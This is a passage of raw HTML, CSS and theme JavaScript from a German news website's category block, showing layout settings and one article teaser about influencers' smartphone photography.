  1476. <style>body .tdi_142 .tdm-btn-text,body .tdi_142 i{color:#ec3535}body .tdi_142 svg{fill:#ec3535}body .tdi_142 svg *{fill:inherit}body .tdi_142:hover .tdm-btn-text,body .tdi_142:hover i{color:#000000;-webkit-text-fill-color:unset;background:transparent;transition:none}body .tdi_142:hover svg{fill:#000000}body .tdi_142:hover svg *{fill:inherit}.tdi_142 i{font-size:20px}.tdi_142 .tdm-btn-icon:last-child{margin-left:10px}.tdi_142{font-family:Work Sans!important;font-size:13px!important;line-height:1.2!important;font-weight:600!important;text-transform:uppercase!important;height:auto}@media (min-width:768px) and (max-width:1018px){.tdi_142 i{font-size:17px}.tdi_142 .tdm-btn-icon:last-child{margin-left:6px}.tdi_142{font-size:12px!important}}</style><div class="tds-button td-fix-index"><a href="category/politics/"  title="Alle ansehen" class="tds-button5 tdm-btn tdm-btn-sm tdi_142 " ><span class="tdm-btn-text">Alle ansehen</span><i class="tdm-btn-icon tdc-font-tdmp tdc-font-tdmp-arrow-right"></i></a></div></div></div></div></div></div><div class="td_block_wrap td_flex_block_4 tdi_143 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_143" >
  1477. <style>.tdi_143{margin-bottom:0px!important}@media (max-width:767px){.tdi_143{margin-bottom:0px!important}}</style>
  1478. <style>.tdi_143 .td_module_wrap{padding-left:10px;padding-right:10px}.tdi_143 .td_block_inner{margin-left:-10px;margin-right:-10px}.tdi_143 .td_module_flex_1{padding-bottom:10px;margin-bottom:10px}.tdi_143 .td_module_flex_1 .td-module-container:before{bottom:-10px;border-width:0 0 1px 0;border-style:none;border-color:#eaeaea;border-color:#eaeaea}.tdi_143 .td_module_flex_4{padding-bottom:10px;margin-bottom:10px}.tdi_143 .td_module_flex_4 .td-module-container:before{bottom:-10px;border-width:0 0 1px 0;border-style:none;border-color:#eaeaea;border-color:#eaeaea}.tdi_143 .td_module_wrap:last-child{margin-bottom:0!important;padding-bottom:0!important}.tdi_143 .td_module_wrap:last-child .td-module-container:before{display:none}.tdi_143 .td_module_flex_1 .td-module-container{border-width:0 0 1px 0;border-style:solid;border-color:#000;border-color:#eaeaea;flex-direction:column}.tdi_143 .td_module_flex_4 .td-module-container{border-color:#eaeaea}.tdi_143 .td_module_flex_1 .entry-thumb{background-position:center 50%}.tdi_143 .td_module_flex_4 .entry-thumb{background-position:center 50%}.tdi_143 .td_module_flex_4 .td-image-container{flex:0 0 30%;width:30%;display:block;order:0}.tdi_143 .td_module_flex_1 .td-image-wrap{padding-bottom:70%}.ie10 .tdi_143 .td_module_flex_1 .td-image-container,.ie11 .tdi_143 .td_module_flex_1 .td-image-container{flex:0 0 auto}.ie10 .tdi_143 .td_module_flex_4 .td-module-meta-info,.ie11 .tdi_143 .td_module_flex_4 .td-module-meta-info{flex:1}body .tdi_143 .td_module_flex_1 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}body .tdi_143 .td_module_flex_4 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_143 .td_module_flex_4 .td-video-play-ico{width:20px;height:20px;font-size:20px}.tdi_143 .td_module_flex_1 .td-video-play-ico{top:50%;left:50%;transform:translate(-50%,-50%)}.tdi_143 .td_module_flex_1 .td-post-vid-time{display:block}.tdi_143 .td_module_flex_4 .td-post-vid-time{display:block}.tdi_143 .td_module_flex_1 .td-module-meta-info{position:relative;padding:20px 0}.tdi_143 .td_module_flex_1 .td-category-pos-image .td-post-category:not(.td-post-extra-category){top:auto;bottom:0}.tdi_143 .td_module_flex_4 .td-module-meta-info{padding:0px}.tdi_143 .td_module_flex_1 .entry-title{margin:0 0 12px 0;font-family:PT Serif!important;font-size:26px!important;line-height:1.1!important;font-weight:600!important}.tdi_143 .td_module_flex_4 .entry-title{margin:0 0 8px 0;font-family:Work Sans!important;font-size:16px!important;line-height:1.2!important;font-weight:600!important}.tdi_143 .td_module_flex_1 .td-audio-player{font-size:13px;opacity:1;visibility:visible;height:auto}.tdi_143 .td_module_flex_4 .td-audio-player{font-size:12px;opacity:1;visibility:visible;height:auto}.tdi_143 .td_module_flex_1 .td-post-category{margin:0px;padding:0px;border:0px solid #aaa;background-color:rgba(255,255,255,0);color:#ec3535}.tdi_143 .td_module_flex_4 .td-post-category{margin:0px;padding:0px;border:0px solid #aaa;background-color:rgba(255,255,255,0);color:#ec3535}.tdi_143 .td_module_flex_1 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:100%}.tdi_143 .td_module_flex_4 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:100%}.tdi_143 .td_module_flex_1 .td-post-category:not(.td-post-extra-category){display:none}.tdi_143 .td_module_flex_4 .td-post-category:not(.td-post-extra-category){display:none}.tdi_143 .td_module_flex_1 .td-excerpt{display:none}.tdi_143 .td_module_flex_4 .td-excerpt{display:none}.tdi_143 .td_module_flex_1 .td-author-date{display:inline}.tdi_143 .td_module_flex_4 .td-author-date{display:inline}.tdi_143 .td_module_flex_4 .td-post-author-name{display:none}.tdi_143 .td_module_flex_1 .td-post-date,.tdi_143 .td_module_flex_1 .td-post-author-name span{display:inline-block;color:#000000}.tdi_143 .td_module_flex_1 .entry-review-stars{display:inline-block}.tdi_143 .td_module_flex_1 .td-icon-star,.tdi_143 .td_module_flex_1 .td-icon-star-empty,.tdi_143 .td_module_flex_1 .td-icon-star-half{font-size:15px}.tdi_143 .td_module_flex_4 .entry-review-stars{display:inline-block}.tdi_143 .td_module_flex_4 .td-icon-star,.tdi_143 .td_module_flex_4 .td-icon-star-empty,.tdi_143 .td_module_flex_4 .td-icon-star-half{font-size:15px}.tdi_143 .td_module_flex_1 .td-module-comments{display:none}.tdi_143 .td_module_flex_4 .td-module-comments{display:none}.tdi_143 .td_module_flex_1 .td-module-title a{color:#000000}.tdi_143 .td_module_flex_1:hover .td-module-title a{color:#f43f3f!important}.tdi_143 .td_module_flex_4 .td-module-title a{color:#000000}.tdi_143 .td_module_flex_4:hover .td-module-title a{color:#f43f3f!important}.tdi_143 .td_module_flex_1 a{transition:all 0.1s ease;-webkit-transition:all 0.1s ease;box-shadow:inset 0 0 0 0 #000}.tdi_143 .td_module_flex_4 a{transition:all 0.1s ease;-webkit-transition:all 0.1s ease;box-shadow:inset 0 0 0 0 #000}.tdi_143 .td_module_flex_1 .td-post-author-name a{color:#000000}.tdi_143 .td_module_flex_1 .td-post-author-name:hover a{color:#ec3535}.tdi_143 .td_module_flex_4 .td-post-date,.tdi_143 .td_module_flex_4 .td-post-author-name span{color:#000000}.tdi_143 .td_module_flex_1.td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 8px 0 0;padding:5px 8px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_143 .td_module_flex_4.td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_143 .td_module_flex_1.td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_143 .td_module_flex_4.td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_143 .td_module_flex_1 .td-editor-date,.tdi_143 .td_module_flex_1 .td-editor-date .td-post-author-name a,.tdi_143 .td_module_flex_1 .td-editor-date .entry-date,.tdi_143 .td_module_flex_1 .td-module-comments a{font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:500!important;text-transform:capitalize!important;letter-spacing:-0.5px!important}.tdi_143 .td_module_flex_4 .td-editor-date,.tdi_143 .td_module_flex_4 .td-editor-date .td-post-author-name a,.tdi_143 .td_module_flex_4 .td-editor-date .entry-date,.tdi_143 .td_module_flex_4 .td-module-comments a{font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:500!important;text-transform:capitalize!important;letter-spacing:-0.5px!important}html:not([class*='ie']) .tdi_143 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:767px){.tdi_143 .td_module_wrap{width:33.33333333%;float:left}.rtl .tdi_143 .td_module_wrap{float:right}}@media (min-width:767px){.tdi_143 .td_module_wrap:nth-child(3n+1){clear:both}}@media (min-width:767px){.tdi_143 .td_module_wrap:nth-last-child(-n+3){margin-bottom:0!important;padding-bottom:0!important}.tdi_143 .td_module_wrap:nth-last-child(-n+3) .td-module-container:before{display:none}}@media (min-width:1019px) and (max-width:1140px){.tdi_143 .td_module_wrap{padding-left:7.5px;padding-right:7.5px}.tdi_143 .td_block_inner{margin-left:-7.5px;margin-right:-7.5px}.tdi_143 .td_module_flex_1{padding-bottom:7.5px;margin-bottom:7.5px}.tdi_143 .td_module_flex_1 .td-module-container:before{bottom:-7.5px}.tdi_143 .td_module_flex_4{padding-bottom:8px;margin-bottom:8px}.tdi_143 .td_module_flex_4 .td-module-container:before{bottom:-8px}.tdi_143 .td_module_wrap:last-child{margin-bottom:0!important;padding-bottom:0!important}.tdi_143 .td_module_wrap:last-child .td-module-container:before{display:none}.tdi_143 .td_module_flex_1 .td-module-meta-info{padding:15px 0}.tdi_143 .td_module_flex_1 .entry-title{margin:0 0 10px;font-size:19px!important}.tdi_143 .td_module_flex_4 .entry-title{margin:0 0 6px 0;font-size:14px!important}.tdi_143 .td_module_flex_1 .td-post-author-name{display:none}.tdi_143 .td_module_flex_1 a{transition:all 0.1s ease;-webkit-transition:all 0.1s ease;box-shadow:inset 0 0 0 0 #000}.tdi_143 .td_module_flex_4 a{transition:all 0.1s ease;-webkit-transition:all 0.1s ease;box-shadow:inset 0 0 0 0 #000}.tdi_143 .td_module_flex_1.td-module-exclusive .td-module-title a:before{font-size:12px!important}.tdi_143 .td_module_flex_4.td-module-exclusive .td-module-title a:before{font-size:11px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_143 .td_module_wrap{padding-left:5px;padding-right:5px}.tdi_143 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_143 .td_module_flex_1{padding-bottom:6px;margin-bottom:6px}.tdi_143 .td_module_flex_1 .td-module-container:before{bottom:-6px}.tdi_143 .td_module_flex_4{padding-bottom:5px;margin-bottom:5px}.tdi_143 .td_module_flex_4 .td-module-container:before{bottom:-5px}.tdi_143 .td_module_wrap:last-child{margin-bottom:0!important;padding-bottom:0!important}.tdi_143 .td_module_wrap:last-child .td-module-container:before{display:none}.tdi_143 .td_module_flex_1 .td-module-meta-info{padding:12px 0}.tdi_143 .td_module_flex_1 .entry-title{margin:0 0 8px;font-size:17px!important}.tdi_143 .td_module_flex_4 .entry-title{margin:0px;font-size:13px!important}.tdi_143 .td_module_flex_1 .td-post-author-name{display:none}.tdi_143 .td_module_flex_4 .td-post-date,.tdi_143 .td_module_flex_4 .td-post-author-name span{display:none}.tdi_143 .td_module_flex_4 .td-icon-star,.tdi_143 .td_module_flex_4 .td-icon-star-empty,.tdi_143 .td_module_flex_4 .td-icon-star-half{font-size:10px}.tdi_143 .td_module_flex_1 a{transition:all 0.1s ease;-webkit-transition:all 0.1s ease;box-shadow:inset 0 0 0 0 #000}.tdi_143 .td_module_flex_4 a{transition:all 0.1s ease;-webkit-transition:all 0.1s ease;box-shadow:inset 0 0 0 0 #000}.tdi_143 .td_module_flex_1.td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_143 .td_module_flex_4.td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_143 .td_module_flex_1 .td-editor-date,.tdi_143 .td_module_flex_1 .td-editor-date .td-post-author-name a,.tdi_143 .td_module_flex_1 .td-editor-date .entry-date,.tdi_143 .td_module_flex_1 .td-module-comments a{font-size:12px!important}.tdi_143 .td_module_flex_4 .td-editor-date,.tdi_143 .td_module_flex_4 .td-editor-date .td-post-author-name a,.tdi_143 .td_module_flex_4 .td-editor-date .entry-date,.tdi_143 .td_module_flex_4 .td-module-comments a{font-size:12px!important}}@media (max-width:767px){.tdi_143 .td_module_wrap{padding-left:0px;padding-right:0px}.tdi_143 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_143 .td_module_flex_1{padding-bottom:15px;margin-bottom:15px}.tdi_143 .td_module_flex_1 .td-module-container:before{bottom:-15px}.tdi_143 .td_module_flex_1 .td-module-container{border-width:0px;border-style:solid;border-color:#000}.tdi_143 .td_module_flex_1 .td-module-meta-info{padding:20px 0 0}.tdi_143 .td_module_flex_1 a{transition:all 0.1s ease;-webkit-transition:all 0.1s ease;box-shadow:inset 0 0 0 0 #000}.tdi_143 .td_module_flex_4 a{transition:all 0.1s ease;-webkit-transition:all 0.1s ease;box-shadow:inset 0 0 0 0 #000}.tdi_143 .td_module_flex_1.td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_143 .td_module_flex_4.td-module-exclusive .td-module-title a:before{font-size:11px!important}}</style><script type="rocketlazyloadscript">var block_tdi_143 = new tdBlock();
  1479. block_tdi_143.id = "tdi_143";
  1480. block_tdi_143.atts = '{"modules_on_row":"","limit":"12","modules_category":"above","show_btn":"none","show_excerpt":"eyJwb3J0cmFpdCI6Im5vbmUiLCJhbGwiOiJub25lIn0=","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"60","f_title_font_size":"eyJhbGwiOiIxNiIsInBvcnRyYWl0IjoiMTMiLCJsYW5kc2NhcGUiOiIxNCJ9","f_title_font_line_height":"1.3","show_cat":"","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIxNnB4IDMwcHggMCAwIiwibGFuZHNjYXBlIjoiMTRweCAwIDAgMCIsInBvcnRyYWl0IjoiMTJweCAwIDAgMCJ9","modules_divider":"","image_size":"","meta_info_align":"","image_floated":"","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZSI6eyJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZV9tYXhfd2lkdGgiOjExNDAsImxhbmRzY2FwZV9taW5fd2lkdGgiOjEwMTksInBvcnRyYWl0Ijp7ImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sInBob25lX21heF93aWR0aCI6NzY3fQ==","meta_info_horiz":"content-horiz-left","f_title_font_weight":"600","image_height":"eyJhbGwiOiI3MiIsImxhbmRzY2FwZSI6Ijg1IiwicG9ydHJhaXQiOiI5MCJ9","all_modules_space":"eyJhbGwiOiIyMCIsInBob25lIjoiMzAiLCJwb3J0cmFpdCI6IjE2In0=","art_excerpt":"0","art_title":"eyJhbGwiOiI4cHggMCAwIDAiLCJsYW5kc2NhcGUiOiI2cHggMCAwIDAiLCJwb3J0cmFpdCI6IjRweCAwIDAgMCJ9","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","f_cat_font_transform":"uppercase","f_cat_font_weight":"600","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"none","show_author":"none","mc1_el":"10","f_title_font_family":"456","f_title_font_transform":"","title_txt":"#000000","title_txt_hover":"#f43f3f","cat_txt":"#ec3535","cat_bg":"rgba(255,255,255,0)","modules_category_padding":"0","f_cat_font_family":"653","f_cat_font_size":"eyJhbGwiOiIxMyIsImxhbmRzY2FwZSI6IjEyIn0=","f_cat_font_line_height":"1","modules_gap":"0","modules_category_margin":"0","modules_cat_border":"0","f_cat_font_spacing":"-0.5","columns":"33.33333333%","columns_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_space1":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMiIsInBob25lIjoiMzAifQ==","hide_image3":"yes","category_ids":"","image_height1":"70","modules_space2":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE2IiwicG9ydHJhaXQiOiIxMCJ9","meta_padding2":"0","art_title1":"eyJhbGwiOiIwIDAgMTJweCAwIiwibGFuZHNjYXBlIjoiMCAwIDEwcHgiLCJwb3J0cmFpdCI6IjAgMCA4cHgifQ==","art_title2":"eyJhbGwiOiIwIDAgOHB4IDAiLCJwb3J0cmFpdCI6IjAiLCJsYW5kc2NhcGUiOiIwIDAgNnB4IDAifQ==","f_title1_font_family":"456","f_title2_font_family":"653","f_title1_font_size":"eyJhbGwiOiIyNiIsImxhbmRzY2FwZSI6IjE5IiwicG9ydHJhaXQiOiIxNyJ9","f_title1_font_line_height":"1.1","f_title1_font_weight":"600","f_title2_font_weight":"600","f_title1_font_transform":"","f_title2_font_transform":"","title_txt2":"#000000","title_txt_hover2":"#f43f3f","show_excerpt2":"none","show_com2":"none","show_date2":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","show_author2":"none","modules_category3":"","modules_category_margin1":"0","modules_category_margin2":"0","modules_category_padding1":"0","modules_category_padding2":"0","modules_cat_border1":"0","modules_cat_border2":"0","cat_bg2":"rgba(255,255,255,0)","cat_txt2":"#ec3535","author_photo_radius1":"100%","author_photo_radius2":"100%","review_size2":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta1_font_family":"653","f_meta2_font_family":"653","f_meta1_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta1_font_line_height":"1","f_meta1_font_weight":"500","f_meta2_font_weight":"500","f_meta1_font_transform":"capitalize","f_meta2_font_transform":"capitalize","f_meta1_font_spacing":"-0.5","meta_info_align1":"","meta_padding1":"eyJhbGwiOiIyMHB4IDAiLCJsYW5kc2NhcGUiOiIxNXB4IDAiLCJwb3J0cmFpdCI6IjEycHggMCIsInBob25lIjoiMjBweCAwIDAifQ==","show_author1":"eyJsYW5kc2NhcGUiOiJub25lIiwicG9ydHJhaXQiOiJub25lIn0=","show_com1":"none","show_excerpt1":"none","modules_border_size1":"eyJhbGwiOiIwIDAgMXB4IDAiLCJwaG9uZSI6IjAifQ==","show_cat1":"none","show_cat2":"none","author_photo":"yes","f_title2_font_size":"eyJhbGwiOiIxNiIsImxhbmRzY2FwZSI6IjE0IiwicG9ydHJhaXQiOiIxMyJ9","f_title2_font_line_height":"1.2","f_meta2_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta2_font_line_height":"1","f_meta2_font_spacing":"-0.5","all_underline_color1":"","author_txt":"#000000","author_txt_hover":"#ec3535","date_txt":"#000000","all_underline_color2":"","date_txt2":"#000000","excl_margin_1":"-4px 8px 0 0","excl_padd_1":"5px 8px","excl_radius_1":"2","excl_color_1":"#ffffff","excl_color_h_1":"#ffffff","excl_bg_1":"#ec3535","excl_bg_h_1":"#ec3535","f_excl_1_font_family":"653","f_excl_1_font_transform":"uppercase","f_excl_1_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTEiLCJsYW5kc2NhcGUiOiIxMiIsInBob25lIjoiMTEifQ==","f_excl_1_font_weight":"600","f_excl_1_font_line_height":"1","f_excl_1_font_spacing":"-0.5","excl_margin_2":"-4px 5px 0 0","excl_padd_2":"3px 5px","excl_radius_2":"2","excl_color_2":"#ffffff","excl_color_h_2":"#ffffff","excl_bg_2":"#ec3535","excl_bg_h_2":"#ec3535","f_excl_2_font_family":"653","f_excl_2_font_transform":"uppercase","f_excl_2_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_2_font_weight":"500","f_excl_2_font_line_height":"1","f_excl_2_font_spacing":"-0.5","block_type":"td_flex_block_4","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","mc4_tl":"","mc4_title_tag":"","mc4_el":"","post_ids":"","taxonomies":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","offset":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","h_effect":"","modules_border_style1":"","modules_border_color1":"#eaeaea","modules_divider1":"","modules_divider_color1":"#eaeaea","image_alignment1":"50","image_radius1":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon1":"","video_icon_pos1":"center","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show_1":"inline-block","excl_txt_1":"","all_excl_border_1":"","all_excl_border_style_1":"solid","all_excl_border_color_1":"","excl_border_color_h_1":"","f_excl_1_font_header":"","f_excl_1_font_title":"Label text","f_excl_1_font_settings":"","f_excl_1_font_style":"","f_excl_1_":"","meta_info_horiz1":"content-horiz-left","meta_width1":"","meta_margin1":"","meta_info_border_radius1":"","modules_category_radius1":"0","modules_extra_cat1":"","author_photo_size1":"","author_photo_space1":"","show_date1":"inline-block","show_review1":"inline-block","review_space1":"","review_size1":"2.5","review_distance1":"","art_excerpt1":"","excerpt_middle":"","show_audio1":"block","hide_audio":"","art_audio1":"","art_audio_size1":"1.5","m_padding2":"","modules_border_size2":"","modules_border_style2":"","modules_border_color2":"#eaeaea","modules_divider2":"","modules_divider_color2":"#eaeaea","image_size3":"","image_alignment2":"50","image_width2":"","image_height2":"","image_floated2":"float_left","image_radius2":"","show_favourites2":"","fav_size2":"2","fav_space2":"","fav_ico_color2":"","fav_ico_color_h2":"","fav_bg2":"","fav_bg_h2":"","fav_shadow2_shadow_header":"","fav_shadow2_shadow_title":"Shadow","fav_shadow2_shadow_size":"","fav_shadow2_shadow_offset_horizontal":"","fav_shadow2_shadow_offset_vertical":"","fav_shadow2_shadow_spread":"","fav_shadow2_shadow_color":"","video_icon2":"","video_popup3":"yes","video_rec3":"","video_rec_title3":"","video_rec_color3":"","autoplay_vid3":"yes","show_vid_t3":"block","vid_t_margin3":"","vid_t_padding3":"","excl_show_2":"inline-block","excl_txt_2":"","all_excl_border_2":"","all_excl_border_style_2":"solid","all_excl_border_color_2":"","excl_border_color_h_2":"","f_excl_2_font_header":"","f_excl_2_font_title":"Label text","f_excl_2_font_settings":"","f_excl_2_font_style":"","f_excl_2_":"","meta_info_horiz2":"content-horiz-left","meta_width2":"","meta_margin2":"","meta_info_border_radius2":"","modules_category_radius2":"0","modules_extra_cat2":"","author_photo3":"","author_photo_size2":"","author_photo_space2":"","show_review2":"inline-block","review_space2":"","review_distance2":"","art_excerpt2":"","excerpt_middle3":"","show_audio2":"block","hide_audio3":"","art_audio2":"","art_audio_size2":"1","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title1_font_header":"","f_title1_font_title":"Article title 1","f_title1_font_settings":"","f_title1_font_style":"","f_title1_font_spacing":"","f_title1_":"","f_cat1_font_title":"Article category tag 1","f_cat1_font_settings":"","f_cat1_font_family":"","f_cat1_font_size":"","f_cat1_font_line_height":"","f_cat1_font_style":"","f_cat1_font_weight":"","f_cat1_font_transform":"","f_cat1_font_spacing":"","f_cat1_":"","f_meta1_font_title":"Article meta info 1","f_meta1_font_settings":"","f_meta1_font_style":"","f_meta1_":"","f_ex1_font_title":"Article excerpt 1","f_ex1_font_settings":"","f_ex1_font_family":"","f_ex1_font_size":"","f_ex1_font_line_height":"","f_ex1_font_style":"","f_ex1_font_weight":"","f_ex1_font_transform":"","f_ex1_font_spacing":"","f_ex1_":"","f_title2_font_title":"Article title 2","f_title2_font_settings":"","f_title2_font_style":"","f_title2_font_spacing":"","f_title2_":"","f_cat2_font_title":"Article category tag 2","f_cat2_font_settings":"","f_cat2_font_family":"","f_cat2_font_size":"","f_cat2_font_line_height":"","f_cat2_font_style":"","f_cat2_font_weight":"","f_cat2_font_transform":"","f_cat2_font_spacing":"","f_cat2_":"","f_meta2_font_title":"Article meta info 2","f_meta2_font_settings":"","f_meta2_font_style":"","f_meta2_":"","f_ex2_font_title":"Article excerpt 2","f_ex2_font_settings":"","f_ex2_font_family":"","f_ex2_font_size":"","f_ex2_font_line_height":"","f_ex2_font_style":"","f_ex2_font_weight":"","f_ex2_font_transform":"","f_ex2_font_spacing":"","f_ex2_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","color_overlay":"","meta_bg":"","all_underline_height1":"","cat_bg_hover":"","cat_txt_hover":"","cat_border1":"","cat_border_hover1":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","meta_bg2":"","all_underline_height2":"","cat_bg_hover2":"","cat_txt_hover2":"","cat_border2":"","cat_border_hover2":"","author_txt2":"","author_txt_hover2":"","ex_txt2":"","com_bg2":"","com_txt2":"","rev_txt2":"","audio_btn_color2":"","audio_time_color2":"","audio_bar_color2":"","audio_bar_curr_color2":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","btn_title":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_143","tdc_css_class":"tdi_143","tdc_css_class_style":"tdi_143_rand_style"}';
  1481. block_tdi_143.td_column_number = "1";
  1482. block_tdi_143.block_type = "td_flex_block_4";
  1483. block_tdi_143.post_count = "12";
  1484. block_tdi_143.found_posts = "77";
  1485. block_tdi_143.header_color = "";
  1486. block_tdi_143.ajax_pagination_infinite_stop = "";
  1487. block_tdi_143.max_num_pages = "7";
  1488. tdBlocksArray.push(block_tdi_143);
  1489. </script><div class="td-block-title-wrap"></div><div id=tdi_143 class="td_block_inner td-mc1-wrap">
  1490.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1491.            <div class="td-module-container td-category-pos-above">
  1492.                                    <div class="td-image-container">
  1493.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-welt-der-influencer-wie-sie-mit-ihren-smartphones/"  rel="bookmark" class="td-image-wrap " title="Die Welt der Influencer: Wie sie mit ihren Smartphones beeindruckende Fotos kreieren" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Die-Welt-der-Influencer-Wie-sie-mit-ihren-Smartphones-beeindruckende-Fotos-kreieren-696x464.jpg"  ></span></a></div>                                                                    </div>
  1494.                
  1495.                <div class="td-module-meta-info">
  1496.                                        
  1497.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-welt-der-influencer-wie-sie-mit-ihren-smartphones/"  rel="bookmark" title="Die Welt der Influencer: Wie sie mit ihren Smartphones beeindruckende Fotos kreieren">Die Welt der Influencer: Wie sie mit ihren Smartphones beeindruckende Fotos kreieren</a></h3>
  1498.                    
  1499.                                            <div class="td-editor-date">
  1500.                                                        
  1501.                                                            <span class="td-author-date">
